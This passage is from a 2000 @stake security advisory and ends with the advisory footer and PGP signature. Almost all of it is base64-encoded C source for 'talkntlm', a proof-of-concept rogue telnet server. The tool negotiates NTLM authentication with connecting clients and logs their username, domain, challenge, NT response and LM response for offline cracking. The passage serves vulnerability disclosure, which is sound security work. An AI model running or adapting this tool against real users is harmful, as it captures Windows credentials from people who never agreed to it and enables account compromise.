cHV0ZGRsKDB4Mik7CiAgICBwdXRkd2woMHgxNCk7CiAgICBwdXRkd2woMHgxNCk7CiAgICBw dXRkZGwoMHgzMCk7CiAgICBwdXRkZGwoMHhFMDgyODI5NSk7CiAgICBwdXRhcnJiKDgsY2hh bGxlbmdlKTsKICAgIHB1dGFycmMoOCwiXDBcMFwwXDBcMFwwXDBcMCIpOwogICAgcHV0ZHds KDB4NjQpOwogICAgcHV0ZHdsKDB4NjQpOwogICAgcHV0ZGRsKDB4NDQpOwogICAgcHV0YXJy YygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgy KTsKICAgIHB1dGR3bCgweDE0KTsKICAgIHB1dGFycmMoMjAsIkFcMEJcMENcMERcMEVcMEZc MEdcMEhcMElcMEpcMCIpOwogICAgcHV0ZHdsKDB4MSk7CiAgICBwdXRkd2woMHgxNCk7CiAg ICBwdXRhcnJjKDIwLCJBXDBCXDBDXDBEXDBFXDBGXDBHXDBIXDBJXDBKXDAiKTsKICAgIHB1 dGR3bCgweDQpOwogICAgcHV0ZHdsKDB4MTQpOwogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1ww RFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgzKTsKICAgIHB1dGR3bCgw eDE0KTsgIAogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlww Iik7CiAgICBwdXRkZGwoMCk7CgogICAgcHV0YihJQUMpOwogICAgcHV0YihTRSk7CiAgICBw dXRmbHVzaCgpOwogICAgcHJpbnRmKCI+PiBJQUMgU0IgQVVUSCBSRVBMWSBOVExNIDAgMSAu Li4gY2hhbGxlbmdlIC4uLiBJQUMgU0VcbiIpOwogIAogICAgLy8gR2V0IHRoZSByZXBseSBw YWNrZXQKICAgIGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihn ZXRiKCkhPVNCKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUFVVEgpIGdv dG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9SVMpIGdvdG8gdGVsbmV0bG9nZmFp bDsKICAgIGlmKGdldGIoKSE9TlRMTSkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0 YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPTIpIGdvdG8gdGVs bmV0bG9nZmFpbDsKCiAgICBzaXplPWdldGRkbCgpKzQ7CiAgICBpZihzaXplPjIwNDggfHwg c2l6ZTw2NCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgcHJpbnRmKCI4XG4iKTsKICAgIHJl c3BidWY9KHVuc2lnbmVkIGNoYXIgKiltYWxsb2Moc2l6ZSk7CiAgICBmb3IoaT0wO2k8c2l6 ZTtpKyspIHsKICAgICAgcmVzcGJ1ZltpXT1nZXRiKCk7CiAgICAgIC8vZnByaW50ZihzdGRl cnIsIiUyLjJYOiAiLGkpOwogICAgICAvL2RlYnVnYihyZXNwYnVmW2ldKTsKICAgIH0KICAg IGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNF KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CgogICAgcHJpbnRmKCI8PCBJQUMgU0IgQVVUSCBJUyBO VExNIDAgMiAuLi4gcmVzcG9uc2UgLi4uIElBQyBTRVxuIik7CiAgICAKICAgIAogICAgLy8g 
R2V0IHVzZXJuYW1lCiAgICBpbnQgdXNlcm5hbWVsZW4sdXNlcm5hbWVvZmY7CiAgICBjaGFy ICp1c2VybmFtZTsKICAgIHVzZXJuYW1lbGVuPXJlc3BidWZbMHgyOF0gfCAocmVzcGJ1Zlsw eDI5XTw8OCk7CiAgICB1c2VybmFtZW9mZj1yZXNwYnVmWzB4MkNdIHwgKHJlc3BidWZbMHgy RF08PDgpIHwgCiAgICAgIChyZXNwYnVmWzB4MkVdPDwxNikgfCAocmVzcGJ1ZlsweDJGXTw8 MjQpOwogICAgdXNlcm5hbWU9KGNoYXIgKiltYWxsb2ModXNlcm5hbWVsZW4pOwogICAgaWYo IXVzZXJuYW1lKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBtZW1jcHkodXNlcm5hbWUsJnJl c3BidWZbdXNlcm5hbWVvZmYrNF0sdXNlcm5hbWVsZW4pOwogICAgcHJpbnRmKCJVc2VybmFt ZTogIik7CiAgICBmb3IoaT0wO2k8dXNlcm5hbWVsZW47aSs9MikgewogICAgICBwcmludGYo IiVjIix1c2VybmFtZVtpXSk7CiAgICAgIGZwcmludGYobGYsIiVjIix1c2VybmFtZVtpXSk7 CiAgICAgIHVzZXJuYW1lW2k+PjFdPXVzZXJuYW1lW2ldOwogICAgfQogICAgdXNlcm5hbWVs ZW4+Pj0xOwogICAgcHJpbnRmKCJcbiIpOwogICAgZnByaW50ZihsZiwiOiIpOwogICAgZnJl ZSh1c2VybmFtZSk7CiAgICAKICAgIC8vIEdldCBkb21haW5uYW1lCiAgICBpbnQgZG9tYWlu bmFtZWxlbixkb21haW5uYW1lb2ZmOwogICAgY2hhciAqZG9tYWlubmFtZTsKICAgIGRvbWFp bm5hbWVsZW49cmVzcGJ1ZlsweDIwXSB8IChyZXNwYnVmWzB4MjFdPDw4KTsKICAgIGRvbWFp bm5hbWVvZmY9cmVzcGJ1ZlsweDI0XSB8IChyZXNwYnVmWzB4MjVdPDw4KSB8IAogICAgICAo cmVzcGJ1ZlsweDI2XTw8MTYpIHwgKHJlc3BidWZbMHgyN108PDI0KTsKICAgIGRvbWFpbm5h bWU9KGNoYXIgKiltYWxsb2MoZG9tYWlubmFtZWxlbik7CiAgICBpZighZG9tYWlubmFtZSkg Z290byB0ZWxuZXRsb2dmYWlsOwogICAgbWVtY3B5KGRvbWFpbm5hbWUsJnJlc3BidWZbZG9t YWlubmFtZW9mZis0XSxkb21haW5uYW1lbGVuKTsKICAgIHByaW50ZigiRG9tYWluOiAiKTsK ICAgIGZvcihpPTA7aTxkb21haW5uYW1lbGVuO2krPTIpIHsKICAgICAgcHJpbnRmKCIlYyIs ZG9tYWlubmFtZVtpXSk7CiAgICAgIGZwcmludGYobGYsIiVjIix1c2VybmFtZVtpXSk7CiAg ICAgIGRvbWFpbm5hbWVbaT4+MV09ZG9tYWlubmFtZVtpXTsKICAgIH0KICAgIGRvbWFpbm5h bWVsZW4+Pj0xOwogICAgcHJpbnRmKCJcbiIpOwogICAgZnByaW50ZihsZiwiOiIpOwogICAg ZnJlZShkb21haW5uYW1lKTsKICAgIAogICAgLy8gV3JpdGUgY2hhbGxlbmdlCiAgICBmcHJp bnRmKGxmLCIlMi4yWCUyLjJYJTIuMlglMi4yWCUyLjJYJTIuMlglMi4yWCUyLjJYOiIsCgkg ICAgY2hhbGxlbmdlWzBdLGNoYWxsZW5nZVsxXSxjaGFsbGVuZ2VbMl0sY2hhbGxlbmdlWzNd LAoJICAgIGNoYWxsZW5nZVs0XSxjaGFsbGVuZ2VbNV0sY2hhbGxlbmdlWzZdLGNoYWxsZW5n 
ZVs3XSk7CgogICAgLy8gR2V0IE5UIHJlc3BvbnNlCiAgICBpbnQgbnRyZXNwbGVuLG50cmVz cG9mZjsKICAgIHVuc2lnbmVkIGNoYXIgKm50cmVzcDsKICAgIG50cmVzcGxlbj1yZXNwYnVm WzB4MTBdIHwgKHJlc3BidWZbMHgxMV08PDgpOwogICAgbnRyZXNwb2ZmPXJlc3BidWZbMHgx NF07Ly8gfCAocmVzcGJ1ZlsweDE1XTw8OCkgfCAocmVzcGJ1ZlsweDE2XTw8MTYpIHwgKHJl c3BidWZbMHgxN108PDI0KTsKICAgIG50cmVzcD0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhu dHJlc3BsZW4pOwogICAgaWYoIW50cmVzcCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgbWVt Y3B5KG50cmVzcCwmcmVzcGJ1ZltudHJlc3BvZmYrNF0sbnRyZXNwbGVuKTsKICAgIHByaW50 ZigiTlQgUmVzcG9uc2U6XG4iKTsKICAgIGZvcihpPTA7aTxudHJlc3BsZW47aSsrKSB7CiAg ICAgIHByaW50ZigiJTIuMlggIixudHJlc3BbaV0pOwogICAgICBmcHJpbnRmKGxmLCIlMi4y WCIsbnRyZXNwW2ldKTsKICAgICAgaWYoaSU4PT03KSBwcmludGYoIlxuIik7CiAgICB9CiAg ICBwcmludGYoIlxuIik7CiAgICBmcHJpbnRmKGxmLCI6Iik7CiAgICBmcmVlKG50cmVzcCk7 CiAgICAKICAgIC8vIEdldCBMTSByZXNwb25zZQogICAgaW50IGxtcmVzcGxlbixsbXJlc3Bv ZmY7CiAgICB1bnNpZ25lZCBjaGFyICpsbXJlc3A7CiAgICBsbXJlc3BsZW49cmVzcGJ1Zlsw eDE4XSB8IChyZXNwYnVmWzB4MTldPDw4KTsKICAgIGxtcmVzcG9mZj1yZXNwYnVmWzB4MUNd IHwgKHJlc3BidWZbMHgxRF08PDgpIHwgCiAgICAgIChyZXNwYnVmWzB4MUVdPDwxNikgfCAo cmVzcGJ1ZlsweDFGXTw8MjQpOwogICAgbG1yZXNwPSh1bnNpZ25lZCBjaGFyICopbWFsbG9j KGxtcmVzcGxlbik7CiAgICBpZighbG1yZXNwKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBt ZW1jcHkobG1yZXNwLCZyZXNwYnVmW2xtcmVzcG9mZis0XSxsbXJlc3BsZW4pOwogICAgcHJp bnRmKCJMTSBSZXNwb25zZTpcbiIpOwogICAgZm9yKGk9MDtpPGxtcmVzcGxlbjtpKyspIHsK ICAgICAgcHJpbnRmKCIlMi4yWCAiLGxtcmVzcFtpXSk7CiAgICAgIGZwcmludGYobGYsIiUy LjJYIixsbXJlc3BbaV0pOwogICAgICBpZihpJTg9PTcpIHByaW50ZigiXG4iKTsKICAgIH0K ICAgIHByaW50ZigiXG4iKTsKICAgIGZwcmludGYobGYsIlxuIik7CiAgICBmcmVlKGxtcmVz cCk7ICAKICAgIAogICAgZnJlZShyZXNwYnVmKTsKICAgIAogICAgZmNsb3NlKGxmKTsKICAg IC8vIENsb3NlIHRoZSB0ZWxuZXQgc2Vzc2lvbgogICAgZmNsb3NlKGdfZkNvbW1Tb2NrKTsK ICAgIHByaW50ZigiY2xvc2VkIHRlbG5ldCBzb2NrZXQuXG4iKTsKCiAgfQoKICByZXR1cm4g MDsKICAKIHRlbG5ldGxvZ2ZhaWw6OyAvLyBGYWlsdXJlCiAgCiAgaWYobGYhPU5VTEwpCiAg ICBmY2xvc2UobGYpOwogIHByaW50ZigidGVsbmV0IG5lZ290aWF0aW9uIGZhaWxlZC5cbiIp 
OwogIGZjbG9zZShnX2ZDb21tU29jayk7CiAgCiAgcmV0dXJuIC01Owp9CgoKCnZvaWQgdXNh Z2UoY2hhciAqcHJvZ25hbWUsaW50IGV4aXRjb2RlKQp7CiAgcHJpbnRmKCJ0YWxrbnRsbSB2 JWQuJWQgKCVzKVxuIixNQUpPUl9WRVJTSU9OLE1JTk9SX1ZFUlNJT04scHJvZ25hbWUpOwog IHByaW50ZigidXNhZ2U6IHRhbGtudGxtIC10IFstcCA8cG9ydD5dIC1sIDxjaGFsbGVuZ2Ug cmVzcG9uc2UgbG9nZmlsZT5cbiIscHJvZ25hbWUpOwogIGV4aXQoZXhpdGNvZGUpOwp9CgoK aW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkKewogIHVuc2lnbmVkIGNoYXIgYjsK ICBpbnQgaSx0cDsKICAKICAvLyBHZXQgb3B0aW9ucwogIAogIGludCBvcHRfcG9ydD0wOwog IGNoYXIgKm9wdF9sb2dmaWxlPU5VTEw7CiAgTUVUSE9EIG9wdF9tZXRob2Q9TUVUSE9EX05P TkU7CiAgU1VCTUVUSE9EIG9wdF9zdWJtZXRob2Q9U1VCTUVUSE9EX05PTkU7CgogIGNoYXIg b2M7CiAgd2hpbGUoKG9jPWdldG9wdChhcmdjLGFyZ3YsImw6cDp0IikpPjApIHsKICAgIHN3 aXRjaChvYykgewogICAgY2FzZSAndCc6CiAgICAgIG9wdF9tZXRob2Q9TUVUSE9EX1RFTE5F VDsKICAgICAgaWYob3B0X3BvcnQ9PTApIHsKCW9wdF9wb3J0PTIzOwogICAgICB9CiAgICAg IGJyZWFrOwogICAgY2FzZSAncCc6CiAgICAgIG9wdF9wb3J0PWF0b2kob3B0YXJnKTsKICAg ICAgYnJlYWs7CiAgICBjYXNlICdsJzoKICAgICAgb3B0X2xvZ2ZpbGU9b3B0YXJnOwogICAg ICBpZihvcHRfc3VibWV0aG9kIT1TVUJNRVRIT0RfTk9ORSkKCXVzYWdlKGFyZ3ZbMF0sLTIp OwogICAgICBvcHRfc3VibWV0aG9kPVNVQk1FVEhPRF9MT0c7CiAgICAgIGJyZWFrOwogICAg ZGVmYXVsdDoKICAgICAgdXNhZ2UoYXJndlswXSwtMyk7CiAgICAgIAogICAgICBicmVhazsK ICAgIH0KICB9CiAgCiAgLy8gR28gdG8gdGhlIHBhcnRpY3VsYXIgbWV0aG9kCiAgaWYob3B0 X21ldGhvZD09TUVUSE9EX05PTkUpIHsKICAgIHVzYWdlKGFyZ3ZbMF0sLTQpOwogIH0gCiAg ZWxzZSBpZihvcHRfbWV0aG9kPT1NRVRIT0RfVEVMTkVUKSB7CiAgICAKICAgIC8vIFRlbG5l dCBtZXRob2RzCiAgICAKICAgIGlmKG9wdF9zdWJtZXRob2Q9PVNVQk1FVEhPRF9OT05FKSB7 CiAgICAgIHVzYWdlKGFyZ3ZbMF0sLTUpOwogICAgCiAgICB9CiAgICBlbHNlIGlmKG9wdF9z dWJtZXRob2Q9PVNVQk1FVEhPRF9MT0cpIHsKCiAgICAgIC8vIFRlbG5ldCBoYXNoIGxvZ2dp bmcKCiAgICAgIGlmKG9wdF9sb2dmaWxlPT1OVUxMKSB7Cgl1c2FnZShhcmd2WzBdLC03KTsK ICAgICAgfQogICAgICBpZihkb190ZWxuZXRfbG9nKG9wdF9wb3J0LG9wdF9sb2dmaWxlKSE9 MCkKCXJldHVybiAtODsKICAgIAogICAgfQoKICB9CgogIHJldHVybiAwOwp9CgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgo= ===================== For more advisories: 
  http://www.atstake.com/research/advisories/

PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQA/AwUBOcEW2FESXwDtLdMhEQLnygCfXkCf0JtJJ4S4GSI+Mwo8gVR/Tg0AnRBY
Rt6xVIMOB6Xi/VKj/A+bfwNw
=retS
-----END PGP SIGNATURE-----